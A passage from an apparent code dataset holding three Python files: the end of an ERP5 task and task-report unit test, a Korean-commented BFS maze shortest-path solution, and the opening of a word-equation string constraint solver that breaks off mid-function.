task_report.getDescription())\n self.assertEqual(task.getPriceCurrency(), task_report.getPriceCurrency())\n self.assertEqual(len(task_report.contentValues()), 1)\n task_report_line = task_report.contentValues()[0]\n self.assertEqual(task.getTaskLineResource(), task_report_line.getResource())\n self.assertEqual(task.getTaskLineQuantity(), task_report_line.getQuantity())\n self.assertEqual(task.getTaskLinePrice(), task_report_line.getPrice())\n self.assertEqual(task.getTaskLineRequirement(),\n task_report_line.getRequirement())\n\n def stepCreateTaskLine(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Create task line and fill with dummy data.\n \"\"\"\n task = sequence.get('task')\n task_line = task.newContent(\n portal_type=self.task_line_portal_type,\n title='New Task Line',\n description='New Task Line Description')\n sequence.edit(task_line=task_line)\n\n def stepFillTaskLineWithData(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Fill task line with dummy data.\n \"\"\"\n organisation = sequence.get('organisation_list')[0]\n resource1 = sequence.get('resource_list')[1]\n task_line = sequence.get('task_line')\n task_line.edit(\n source_value=organisation,\n resource_value=resource1,\n quantity=self.default_quantity,\n price=self.default_price)\n\n def stepVerifyGeneratedTaskReportLines(self, sequence=None,\n sequence_list=None, **kw):\n \"\"\"\n Verify that simulation generated report is correct.\n \"\"\"\n task = sequence.get('task')\n task_report = sequence.get('task_report')\n task_content_list = task.contentValues()\n self.assertNotEqual(len(task_content_list), 0)\n self.assertEqual(len(task_report.contentValues()),\n len(task_content_list))\n\n # Task report values not tested\n # XXX\n # Task line not precisely tested\n for task_line in task_content_list:\n task_report_resource_list = \\\n [line.getResource() for line in task_report.contentValues()]\n task_report_quantity_list = \\\n [line.getQuantity() for line in task_report.contentValues()]\n task_report_price_list = \\\n [line.getPrice() for line in task_report.contentValues()]\n self.assertIn(task_line.getResource(), task_report_resource_list)\n self.assertIn(task_line.getQuantity(), task_report_quantity_list)\n self.assertIn(task_line.getPrice(), task_report_price_list)\n\n for task_report_line in task_report.contentValues(portal_type='Task Report Line'):\n simulation_movement = task_report_line.getDeliveryRelatedValue()\n task_line = simulation_movement.getDeliveryValue()\n self.assertTrue(task_line.getDescription())\n self.assertEqual(task_line.getDescription(),\n task_report_line.getDescription())\n\n def stepAssertDraftCausalityState(self, sequence=None,\n sequence_list=None, **kw):\n \"\"\"\n Verify that confirmed task report starts building and gets solved.\n \"\"\"\n task_report = sequence.get('task_report')\n self.assertEqual(task_report.getCausalityState(), 'draft')\n\n def stepVerifyTaskReportNoPrice(self, sequence=None,\n sequence_list=None, **kw):\n task_report = sequence.get('task_report')\n self.assertEqual(None, task_report.getPriceCurrency())\n self.assertEqual(1, len(task_report.getMovementList()))\n task_report_line = task_report.getMovementList()[0]\n self.assertEqual(None, task_report_line.getPrice())\n\n def modifyState(self, object_name, transition_name, sequence=None,\n sequence_list=None):\n object_value = sequence.get(object_name)\n workflow_method = getattr(object_value, transition_name)\n workflow_method()\n\n def stepConfirmTask(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task', 'confirm', sequence=sequence)\n\n def stepConfirmTaskReport(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task_report', 'confirm', sequence=sequence)\n\n def stepStartTaskReport(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task_report', 'start', sequence=sequence)\n\n def stepFinishTaskReport(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task_report', 'stop', sequence=sequence)\n\n def stepCloseTaskReport(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task_report', 'deliver', sequence=sequence)\n\n def stepRestartTaskReport(self, sequence=None, sequence_list=None, **kw):\n self.modifyState('task_report', 'restart', sequence=sequence)\n\n def stepSetTaskReport(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Set task report object in sequence.\n \"\"\"\n task = sequence.get('task')\n task_report = task.getCausalityRelatedValueList(\n portal_type='Task Report')[0]\n sequence.edit(task_report=task_report)\n\n def stepVerifyMergedTaskLine(self, sequence=None,\n sequence_list=None, **kw):\n \"\"\"\n Verify that simulation generated report is correct.\n \"\"\"\n task = sequence.get('task')\n task_report = sequence.get('task_report')\n self.assertEqual('confirmed', task_report.getSimulationState())\n self.assertEqual(task.getSource(), task_report.getSource())\n self.assertEqual(task.getSourceSection(), task_report.getSourceSection())\n self.assertEqual(task.getSourceProject(), task_report.getSourceProject())\n self.assertEqual(task.getDestination(), task_report.getDestination())\n self.assertEqual(task.getDestinationSection(),\n task_report.getDestinationSection())\n self.assertEqual(task.getDestinationDecision(),\n task_report.getDestinationDecision())\n self.assertEqual(task.getTitle(),\n task_report.getTitle())\n self.assertEqual(task.getDescription(),\n task_report.getDescription())\n self.assertEqual(task.getPredecessor(), task_report.getPredecessor())\n self.assertEqual(task.getDescription(), task_report.getDescription())\n self.assertEqual(len(task_report.contentValues()), 2)\n for task_report_line in task_report.contentValues():\n self.assertEqual(task.contentValues()[0].getResource(),\n task_report_line.getResource())\n self.assertEqual(task.contentValues()[0].getQuantity(),\n task_report_line.getQuantity())\n self.assertEqual(task.contentValues()[0].getPrice(),\n task_report_line.getPrice())\n self.assertEqual(task.contentValues()[0].getRequirement(),\n task_report_line.getRequirement())\n\n def stepSetUpLedgerCategory(self, sequence=None, sequence_list=None, **kw):\n ledger = self.portal.portal_categories.ledger\n if not ledger.get('favourite_ledger', None):\n ledger.newContent(portal_type='Category', id='favourite_ledger')\n if not ledger.get('default_task_report_ledger', None):\n ledger.newContent(portal_type='Category',\n id='default_task_report_ledger')\n\n def stepSetDifferentDefaultLedgerForTaskandTaskReport(self, sequence=None,\n sequence_list=None, **kw):\n task_portal_type = self.portal.portal_types['Task']\n task_report_portal_type = self.portal.portal_types['Task Report']\n\n task_portal_type.edit(ledger='favourite_ledger')\n task_report_portal_type.edit(ledger=['default_task_report_ledger',\n 'favourite_ledger'])\n\n def stepCheckTaskReportLedgerIsSameAsTaskLedger(self, sequence=None,\n sequence_list=None, **kw):\n task = sequence.get('task')\n task_report = sequence.get('task_report')\n\n self.assertTrue(task.hasLedger())\n self.assertTrue(task_report.hasLedger())\n self.assertEqual(task.getLedger(), task_report.getLedger())\n\n def stepCheckTaskReportLedgerIsDifferentFromItsDefaultLedger(self,\n sequence=None, sequence_list=None, **kw):\n task_report = sequence.get('task_report')\n task_report_portal_type = self.portal.portal_types['Task Report']\n\n self.assertNotEqual(task_report.getLedger(),\n task_report_portal_type.getDefaultLedger())\n\nclass TestTask(TestTaskMixin, ERP5TypeTestCase):\n \"\"\"\n Test task behaviour.\n \"\"\"\n run_all_test = 1\n\n def afterSetUp(self):\n self.stepLogin()\n self.validateRules()\n self.tic()\n\n def getTitle(self):\n return \"Task\"\n\n def enableLightInstall(self):\n \"\"\"\n You can override this.\n Return if we should do a light install (1) or not (0)\n \"\"\"\n return 1\n\n def enableActivityTool(self):\n \"\"\"\n You can override this.\n Return if we should create (1) or not (0) an activity tool.\n \"\"\"\n return 1\n\n def beforeTearDown(self):\n # Removes default ledger on portal types if they exist\n self.portal.portal_types['Task'].setLedger(None)\n self.portal.portal_types['Task Report'].setLedger(None)\n\n def test_01_testTaskBasicUseCase(self, quiet=0, run=run_all_test):\n \"\"\"\n Test creation of task and (automatic) task_report\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = self.default_task_sequence + '\\\n stepVerifyGeneratedByBuilderTaskReport \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n def test_01_testTaskNoPrice(self, quiet=0, run=run_all_test):\n \"\"\"\n Test creation of task and (automatic) task_report when no price is\n defined on the task\n \"\"\"\n if not run: return\n self.default_price = None\n sequence_list = SequenceList()\n sequence_string = self.default_task_no_price_sequence + '\\\n stepVerifyGeneratedByBuilderTaskReport \\\n stepVerifyTaskReportNoPrice \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n def test_02_testMultipleLineTaskBasicUseCase(self, quiet=0, run=run_all_test):\n \"\"\"\n Test creation of task with multiple task lines \\\n and (automatic) creation of task_report.\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = self.default_task_sequence_two_lines + '\\\n stepVerifyGeneratedTaskReportLines \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n def test_03_testTaskReportBasicUseCase(self, quiet=0, run=run_all_test):\n \"\"\"\n Test creation of task report and task report lines.\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = self.default_task_report_sequence + '\\\n stepConfirmTaskReport \\\n stepTic \\\n stepAssertDraftCausalityState \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n def test_04_checkNotMergedTaskReportLine(self, quiet=0, run=run_all_test):\n \"\"\"\n Check that a task report can not be the created from a merged of multiple\n task lines.\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = 'stepLogin \\\n stepCreateOrganisation \\\n stepCreateOrganisation \\\n stepCreateResource \\\n stepCreateResource \\\n stepCreateSimpleTask \\\n stepSetTaskValues \\\n stepCreateTaskLine \\\n stepFillTaskLineWithData \\\n stepCreateTaskLine \\\n stepFillTaskLineWithData \\\n stepConfirmTask \\\n stepTic \\\n stepSetTaskReport \\\n stepVerifyMergedTaskLine \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n def test_05_testStrictSimulationSecurity(self, quiet=0, run=run_all_test):\n \"\"\"Test creation of task and (automatic) task_report with strict\n security in the simulation.\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = self.default_task_sequence + '\\\n stepVerifyGeneratedByBuilderTaskReport \\\n stepStartTaskReport \\\n stepFinishTaskReport \\\n stepCloseTaskReport \\\n stepTic'\n sequence_list.addSequenceString(sequence_string)\n\n simulation_tool = self.getPortal().portal_simulation\n uf = self.getPortal().acl_users\n if not uf.getUserById('manager'):\n uf._doAddUser('manager', '', ['Manager'], [])\n self.loginByUserName('manager')\n try:\n simulation_tool.Base_setDefaultSecurity()\n self.logout()\n sequence_list.play(self)\n finally:\n self.loginByUserName('manager')\n for permission in simulation_tool.possible_permissions():\n simulation_tool.manage_permission(permission, roles=(), acquire=1)\n self.logout()\n\n def test_06_checkTaskReferenceOnCreationAndPaste(self, quiet=0, run=run_all_test):\n \"\"\"Tests that task reference is set upon creation and coping\"\"\"\n if not run: return\n self.stepLogin()\n task_module = self.portal.getDefaultModule(\n portal_type=self.task_portal_type)\n task = task_module.newContent(portal_type=self.task_portal_type,\n specialise=self.business_process)\n\n self.assertEqual(\n task.getReference(),\n 'T-%s'%(task.getId(),)\n )\n\n cb_data = task_module.manage_copyObjects(ids=[task.getId()])\n p_data = task_module.manage_pasteObjects(cb_data)\n\n new_task = task_module._getOb(p_data[0]['new_id'])\n\n self.assertEqual(\n new_task.getReference(),\n 'T-%s'%(new_task.getId(),)\n )\n\n def test_07_taskConstraints(self):\n \"\"\"Check tasks constraints\"\"\"\n self.stepLogin()\n portal = self.getPortal()\n portal_type = portal.portal_types['Task']\n original_property_sheet_list = portal_type.getTypePropertySheetList()\n try:\n sequence = Sequence(context=self)\n if not('TaskConstraint' in original_property_sheet_list):\n new_property_sheet_list = ['TaskConstraint'] + original_property_sheet_list\n portal_type.edit(type_property_sheet_list=new_property_sheet_list)\n self.commit()\n task_module = portal.getDefaultModule(portal_type=self.task_portal_type)\n task = task_module.newContent(portal_type=self.task_portal_type)\n doActionFor = self.portal.portal_workflow.doActionFor\n self.assertRaises(ValidationFailed, doActionFor, task,\n 'confirm_action')\n sequence('CreateOrganisation')\n sequence('CreateOrganisation')\n sequence('CreateResource')\n (source, destination) = sequence.get('organisation_list')\n check_result = task.checkConsistency()\n self.assertEqual(len(check_result), 4)\n task.setDestinationValue(destination)\n task.setSourceValue(source)\n check_result = task.checkConsistency()\n self.assertEqual(len(check_result), 2)\n task.setStartDate(DateTime())\n task.setStopDate(DateTime() + 1)\n check_result = task.checkConsistency()\n self.assertEqual(len(check_result), 1)\n resource = sequence.get('resource_list')[0]\n task.edit(task_line_resource_value = resource,\n task_line_quantity = self.default_quantity,\n task_line_price = self.default_price,\n )\n check_result = task.checkConsistency()\n self.assertEqual(len(check_result), 0)\n\n finally:\n portal_type.setTypePropertySheetList(original_property_sheet_list)\n\n def test_08_localBuild(self):\n sequence = Sequence(context=self)\n sequence(\"\"\"\n Login\n CreateOrganisation\n CreateOrganisation\n CreateResource\n CreateProject\n CreateRequirement\n CreateSimpleTask\n CreateCurrency\n FillTaskWithData\n SetTaskPriceCurrency\n Tic\n ConfirmTask\n \"\"\")\n self.tic(stop_condition=lambda message_list: all(\n m.method_id != '_updateSimulation' for m in message_list))\n rar, = sequence['task'].getCausalityRelatedValueList()\n sm, = rar.objectValues()\n q = self.portal.cmf_activity_sql_connection.manage_test\n q('update message set processing_node=-4'\n ' where method_id=\"_localBuild\" or path=%r' % sm.getPath())\n self.commit()\n self.portal.portal_activities.process_timer(None, None)\n q('update message set processing_node=-1,'\n ' priority=method_id!=\"_localBuild\"')\n sequence(\"Tic SetTaskReport\")\n\n def test_09_testTaskLedgerIsInheritedByTaskReport(self, quiet=0, run=run_all_test):\n \"\"\"\n Test that a task and its related task report generated by simulation have\n the same ledger, even if the ledger set on the task is not the same as the\n default one set on the \"Task Report\" portal type.\n \"\"\"\n if not run: return\n sequence_list = SequenceList()\n sequence_string = \"\"\"\n SetUpLedgerCategory\n SetDifferentDefaultLedgerForTaskandTaskReport\n \"\"\"\n\n sequence_string += self.default_task_sequence\n\n sequence_string += \"\"\"\n CheckTaskReportLedgerIsSameAsTaskLedger\n CheckTaskReportLedgerIsDifferentFromItsDefaultLedger\n \"\"\"\n\n sequence_list.addSequenceString(sequence_string)\n sequence_list.play(self)\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestTask))\n return suite\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_project/TestTemplateItem/portal_components/test.erp5.testTask.py","file_name":"test.erp5.testTask.py","file_ext":"py","file_size_in_byte":32825,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"71781097203","text":"\"\"\"\n 문제\n\n 사용자는 N X M 크기의 직사각형 형태의 미로에 갇힘. 미로에는 여러 마리의 괴물이 있어 이를 피해 탈출해야 함.\n\n 사용자의 위치는 (1, 1)이며 미로의 출구는 (N, M)의 위치에 존재하며 한 번에 한 칸씩 이동할 수 있음.\n 이때 괴물이 있는 부분은 0으로, 괴물이 없는 부분은 1로 표시되어 있음. 미로는 반드시 탈출할 수 있는 형태로 제시됨.\n\n 이때 사용자가 탈출하기 위해 움직여야 하는 최소 칸의 개수를 구하시오. 칸을 셀 때는 시작 칸과 마지막 칸을 모두 포함해서 계산함.\n\n 입력 예시\n 5 6\n 101010\n 111111\n 000001\n 111111\n 111111\n\"\"\"\nfrom collections import deque\n\nn, m = map(int, input().split())\ngraph = []\nfor _ in range(n):\n row = list(map(int, input()))\n graph.append(row)\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, 1, -1]\n\n\ndef bfs(x, y):\n queue = deque()\n queue.append((x, y))\n\n while queue:\n x, y = queue.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if nx <= -1 or nx >= n or ny <= -1 or ny >= m:\n continue\n\n if graph[nx][ny] == 0:\n continue\n\n # 처음 방문 시에만 최단 거리 기록\n if graph[nx][ny] == 1:\n graph[nx][ny] = graph[x][y] + 1\n queue.append((nx, ny))\n\n return graph[n - 1][m - 1]\n\n\nprint(bfs(0, 0))\n\n\n\"\"\"\n 문제 해결 아이디어\n\n BFS는 시작 지점에서 가까운 노드부터 차례대로 그래프의 모든 노드를 탐색함.\n\n 상, 하, 좌, 우로 연결된 모든 노드로의 거리가 1로 동일함\n - 따라서 (1, 1) 지점부터 BFS를 수행하여 모든 노드의 최단 거리 값을 기록하면 해결할 수 있음.\n\n\"\"\"\n","repo_name":"JngMkk/Algorithm","sub_path":"Algorithm/BFSAndDFS/BFS02.py","file_name":"BFS02.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42289174523","text":"from enum import Enum, unique, auto\nfrom functools import reduce\nfrom itertools import chain, combinations\nfrom typing import List, Tuple, Dict, Set, Optional\n\nimport random\nfrom graphviz import Digraph\nfrom lenc import LengthConstraint, print_length_constraints_as_strings, internal_len_var_name\nfrom prob import Problem, ValueType, internal_str_var_origin_name\nfrom we import WordEquation, StrElement, StrVariable, is_var, is_del, is_char\nfrom fsa import FSA, from_str, remove_first_char, split_by_states, FsaClassification\n\n\n@unique\nclass Rewrite(Enum):\n lvar_be_empty = auto()\n rvar_be_empty = auto()\n lvar_be_char = auto()\n rvar_be_char = auto()\n lvar_be_rvar = auto()\n lvar_longer_char = auto()\n rvar_longer_char = auto()\n lvar_longer_var = auto()\n rvar_longer_var = auto()\n allvar_be_empty = auto()\n on_the_fly_quadratic = auto()\n\n\nclass Strategy(Enum):\n full = auto()\n first = auto()\n shortest = auto()\n shortest_side = auto()\n one_elem_first = auto()\n var_char_first = auto()\n var_var_first = auto()\n empty_vars_first = auto()\n customized = auto()\n\n def __str__(self):\n return self.name\n\n\nclass QuadraticStrategy(Enum):\n same_first = auto()\n same_short = auto()\n same_short_side = auto()\n first = auto()\n shortest = auto()\n shortest_side = auto()\n\n def __str__(self):\n return self.name\n\nTransformRecord = Tuple[Optional[StrElement], Optional[StrElement]]\nRegConstraintClasses = Dict[str, int]\nRegConstraints = Dict[str, FSA]\n\nfsa_classification = FsaClassification() # Object storing FSA classifications\n\n\nclass SolveTreeNode:\n success_we: WordEquation = WordEquation([], [])\n\n def __init__(self, word_equations: List[WordEquation], reg_constraints: Optional[Dict[str, FSA]] = None,\n var_rename_count: Optional[Dict[str, int]] = None):\n self.word_equations = word_equations\n self.reg_constraints: [RegConstraints] = reg_constraints\n if reg_constraints: # there are regular constraint\n self.regc_classes: [RegConstraintClasses] = dict()\n self.regc_classes = dict()\n for name in reg_constraints:\n self.regc_classes[name] = fsa_classification.get_classification(reg_constraints[name])\n else:\n self.regc_classes: [RegConstraintClasses] = None\n if var_rename_count:\n self.var_rename_count = {v: var_rename_count[v] for v in var_rename_count} # make a copy\n else:\n self.var_rename_count: Dict[str, int] = {v.value: 0 for v in self.variables()} # for on-the-fly quadratic\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n if self.regc_classes and other.regc_classes:\n return set(self.word_equations) == set(other.word_equations) and\\\n same_reg_constraints(self.reg_constraints, other.reg_constraints)\n elif not self.regc_classes and not other.regc_classes:\n return set(self.word_equations) == set(other.word_equations)\n return False\n\n def __len__(self):\n return sum(map(len, self.word_equations))\n\n def __bool__(self):\n return True\n\n def __str__(self):\n if self.reg_constraints:\n return '\\n'.join(map(str, self.word_equations)) + ':\\n' +\\\n '\\n'.join([f'{s}:\\n{str(self.reg_constraints[s])}' for s in sorted(self.reg_constraints)])\n else:\n return '\\n'.join([str(e) for e in self.word_equations]) + ':{{}}'\n\n def __repr__(self):\n if self.regc_classes:\n return ','.join(map(str, self.word_equations)) + ':{{' +\\\n ','.join([f'{s}:{self.regc_classes[s]}' for s in sorted(self.regc_classes)]) +\\\n '}'\n else:\n return ','.join(map(str, self.word_equations)) + ':{{}}'\n\n def __hash__(self):\n return hash(repr(self))\n\n def variables(self) -> Set[StrVariable]:\n return reduce(lambda x, y: x | y, [e.variables() for e in self.word_equations])\n\n def var_occurrence(self, elem: Optional[StrVariable] = None):\n if elem: # if elem is specified, count occurrence for elem\n return sum([we.var_occurrence(elem) for we in self.word_equations])\n else: # if elem is not specified, count occurrence for all string variables\n return sum([we.var_occurrence() for we in self.word_equations])\n\n def is_success_node(self):\n # return reduce(lambda x, y: x and y, map(lambda x: x == self.success_we, self.word_equations))\n return reduce(lambda x, y: x and y, [e == self.success_we for e in self.word_equations])\n\n def is_unsolvable_node(self):\n if self.reg_constraints:\n return reduce(lambda x, y: x or y,\n [we.is_simply_unequal() or we.is_empty_constant() for we in self.word_equations] +\n [self.reg_constraints[n].is_empty() for n in self.reg_constraints])\n else:\n return reduce(lambda x, y: x or y,\n [we.is_simply_unequal() or we.is_empty_constant() for we in self.word_equations])\n\n def get_word_equations_to_solve(self) -> List[WordEquation]:\n return [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n\n def pick_first_word_equation(self) -> Optional[WordEquation]:\n candidates = [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n if len(candidates) > 0:\n return candidates[0]\n else:\n return None\n\n def pick_var_char_word_equation(self) -> Optional[WordEquation]:\n candidates = [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n group1 = [we for we in candidates if we.is_char_var_headed() or we.is_var_char_headed() or we.has_emptiness()]\n if len(group1) > 0:\n return group1[0]\n else:\n return None\n\n def pick_var_var_word_equation(self) -> Optional[WordEquation]:\n candidates = [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n group1 = [we for we in candidates if we.is_both_var_headed()]\n if len(group1) > 0:\n return group1[0]\n else:\n return None\n\n def pick_shortest_word_equation(self, side: bool = False) -> Optional[WordEquation]:\n candidates = [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n if len(candidates) > 0:\n if side: # seek the lower side length of a word equation\n candidates_len = [we.min_side_len() for we in candidates]\n else: # seek the total length of a word equation\n candidates_len = [len(we) for we in candidates]\n min_idx = candidates_len.index(min(candidates_len))\n return candidates[min_idx]\n else:\n return None\n\n def pick_one_elem_word_equation(self) -> Optional[WordEquation]: # only one or zero element in one side\n candidates = [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n group1 = [we for we in candidates if len(we.lhs) <= 1 or len(we.rhs) <= 1]\n if len(group1) > 0:\n return group1[0]\n else:\n return None\n\n\ndef same_reg_constraints(regc1: Dict[str, int], regc2: Dict[str, int]) -> bool:\n # check for (1) the same set of keys (2) for each key, classifications of FSA are the same\n return regc1.keys() == regc2.keys() and \\\n sum([1 for e in regc1 if e in regc2 and regc1[e] == regc2[e]]) == len(regc1.keys())\n\n\nclass Transform:\n def __init__(self, source: SolveTreeNode, rewrite: Rewrite,\n record: TransformRecord):\n self.source: SolveTreeNode = source\n self.rewrite: Rewrite = rewrite\n self.record = record\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return (self.source == other.source and\n self.rewrite == other.rewrite and\n self.record == other.record)\n return False\n\n def __str__(self):\n return f'{self.source}, {self.rewrite}, {self.record}'\n\n def __repr__(self):\n return f'{repr(self.source)}, {repr(self.rewrite)}, {repr(self.record)}'\n\n def __hash__(self):\n return hash(repr(self))\n\n\n# this function can be removed later\ndef solution_word_equations(wes: List[WordEquation]) -> bool:\n success_we: WordEquation = WordEquation([], [])\n return reduce(lambda x, y: x and y, map(lambda x: x == success_we, wes))\n\n\nclass SolveTree:\n # success_end: WordEquation = WordEquation([], [])\n\n def __init__(self, root: SolveTreeNode):\n self.root: SolveTreeNode = root\n self.node_relations: Dict[SolveTreeNode, Set[Transform]] = {}\n\n def has_node(self, node: SolveTreeNode):\n return node in self.node_relations\n\n def has_solution(self) -> bool:\n # return reduce(lambda x, y: x or y,\n # [node.is_success_node() for node in self.node_relations.keys()])\n return len([node for node in self.node_relations.keys() if node.is_success_node()]) > 0\n\n def get_solution_node(self) -> Set[SolveTreeNode]:\n return set(e for e in self.node_relations if e.is_success_node())\n\n def add_node(self, src: SolveTreeNode, node: SolveTreeNode, rewrite: Rewrite,\n record: TransformRecord) -> bool:\n transform = Transform(src, rewrite, record)\n if self.has_node(node):\n self.node_relations[node].add(transform)\n return False\n else:\n self.node_relations[node] = {transform}\n return True # True means a new node relation is created\n\n def num_transitions(self):\n return sum(map(len, self.node_relations.values()))\n\n def num_nodes(self):\n return len(self.node_relations.keys() |\n {t.source for e in self.node_relations for t in self.node_relations[e]})\n # all_nodes = set()\n # for node in self.node_relations:\n # all_nodes.add(node)\n # for t in self.node_relations[node]:\n # all_nodes.add(t.source)\n # return len(all_nodes)\n\n\nclass InvalidProblemError(Exception):\n pass\n\n\ndef node_with_new_reg_constraints(wes: List[WordEquation], node: SolveTreeNode, fsa: [FSA],\n var_name: str, process_type: str = 'copy') -> [SolveTreeNode]:\n regc_old = node.reg_constraints\n regc_new: RegConstraints = dict()\n if process_type == 'check':\n for r in regc_old:\n if r == var_name: # check {var_name}'s fsa inclusion, then update\n tmp_fsa = regc_old[r].intersect(fsa)\n tmp_fsa.prune()\n if tmp_fsa.is_empty(): # inclusion is empty, transform failed\n return None\n else: # inclusion ok, update\n regc_new[r] = tmp_fsa\n else: # other variables, copy\n regc_new[r] = regc_old[r]\n if var_name not in regc_old: # in case {var_name} has no regular constraint yet, do update\n regc_new[var_name] = fsa\n elif process_type == 'copy':\n for r in regc_old:\n regc_new[r] = regc_old[r]\n elif process_type == 'update': # do copy first, then update {var_name}'s fsa\n for r in regc_old:\n regc_new[r] = regc_old[r]\n regc_new[var_name] = fsa # update after for-loop, in case {var_name} has no regular constraint yet\n return SolveTreeNode(wes, regc_new, node.var_rename_count)\n\n\nclass BasicSolver:\n def __init__(self, prob: Problem):\n if len(prob.word_equations) < 1:\n raise InvalidProblemError()\n node = SolveTreeNode([e.trim_prefix() for e in prob.word_equations],\n prob.merge_reg_constraints()) # root node\n self.pending_checks: List[SolveTreeNode] = [node]\n self.resolve: SolveTree = SolveTree(node)\n if prob.has_reg_constraints(): # has membership(regular) constraints\n self.alphabet = list(node.reg_constraints.values())[0].alphabet\n self.empty_str_fsa = from_str('', self.alphabet)\n self.fsa_classes: FsaClassification = fsa_classification\n else:\n self.alphabet = None\n self.empty_str_fsa = None\n self.problem = prob # reference to problem data (for on_the_fly_quadratic)\n self.strategy = Strategy.first # word equation selection strategies\n self.disable_var_empty_transform = False # special flag\n self.on_the_fly_quadratic = False # incrementally turning word equations to quadratic during transform\n self.quadratic_strategy = QuadraticStrategy.same_first # strategy for on-the-fly quadratic\n self.debug = False # for printing debug info, False by default\n\n def transform_with_emptiness(self, node: SolveTreeNode, we: WordEquation):\n if self.disable_var_empty_transform:\n return\n lh, rh = hh = we.peek()\n if (not lh or is_del(lh)) and rh and is_var(rh):\n new_wes = [e.remove_element_from_all(rh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, new_wes, Rewrite.rvar_be_empty, hh)\n elif (not rh or is_del(rh)) and lh and is_var(lh):\n new_wes = [e.remove_element_from_all(lh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, new_wes, Rewrite.lvar_be_empty, hh)\n else:\n assert False\n\n def transform_both_var_case(self, node: SolveTreeNode, we: WordEquation):\n lh, rh = hh = we.peek()\n\n if not self.disable_var_empty_transform:\n case1_wes = [e.remove_element_from_all(lh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case1_wes, Rewrite.lvar_be_empty, hh)\n\n case2_wes = [e.remove_element_from_all(rh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case2_wes, Rewrite.rvar_be_empty, hh)\n\n case3_wes = [e.replace(lh, rh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case3_wes, Rewrite.lvar_be_rvar, hh)\n\n if self.on_the_fly_quadratic and node.var_occurrence(lh) > 2:\n new_node, lh_new = turn_one_var_to_quadratic(lh, we, node, self.problem,\n self.quadratic_strategy, self.debug)\n if self.debug:\n print(f'\\nperform on-the-fly quadratic: {lh} in case lvar_longer_var')\n print(f'old node:\\n{print_solve_tree_node_pretty(node)}')\n print(f'node.var_rename_count:\\n{node.var_rename_count}')\n print(f'new node:\\n{print_solve_tree_node_pretty(new_node)}')\n print(f'new_node.var_rename_count:\\n{new_node.var_rename_count}')\n self.resolve.add_node(node, new_node, Rewrite.on_the_fly_quadratic, (lh, lh_new)) # add new_node directly\n # proceed to transform case Rewrite.lvar_longer_var\n case4_wes = [e.replace_with(lh, [rh, lh]).trim_prefix() for e in new_node.word_equations]\n self.process_reg_constraints(new_node, case4_wes, Rewrite.lvar_longer_var, hh)\n else:\n case4_wes = [e.replace_with(lh, [rh, lh]).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case4_wes, Rewrite.lvar_longer_var, hh)\n\n if self.on_the_fly_quadratic and node.var_occurrence(rh) > 2:\n new_node, rh_new = turn_one_var_to_quadratic(rh, we, node, self.problem,\n self.quadratic_strategy, self.debug)\n if self.debug:\n print(f'\\nperform on-the-fly quadratic: {rh} in case rvar_longer_var')\n print(f'old node:\\n{print_solve_tree_node_pretty(node)}')\n print(f'node.var_rename_count:\\n{node.var_rename_count}')\n print(f'new node:\\n{print_solve_tree_node_pretty(new_node)}')\n print(f'new_node.var_rename_count:\\n{new_node.var_rename_count}')\n self.resolve.add_node(node, new_node, Rewrite.on_the_fly_quadratic, (rh, rh_new)) # add new_node directly\n # proceed to transform case Rewrite.rvar_longer_var\n case5_wes = [e.replace_with(rh, [lh, rh]).trim_prefix() for e in new_node.word_equations]\n self.process_reg_constraints(new_node, case5_wes, Rewrite.rvar_longer_var, hh)\n else:\n case5_wes = [e.replace_with(rh, [lh, rh]).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case5_wes, Rewrite.rvar_longer_var, hh)\n\n def transform_char_var_case(self, node: SolveTreeNode, we: 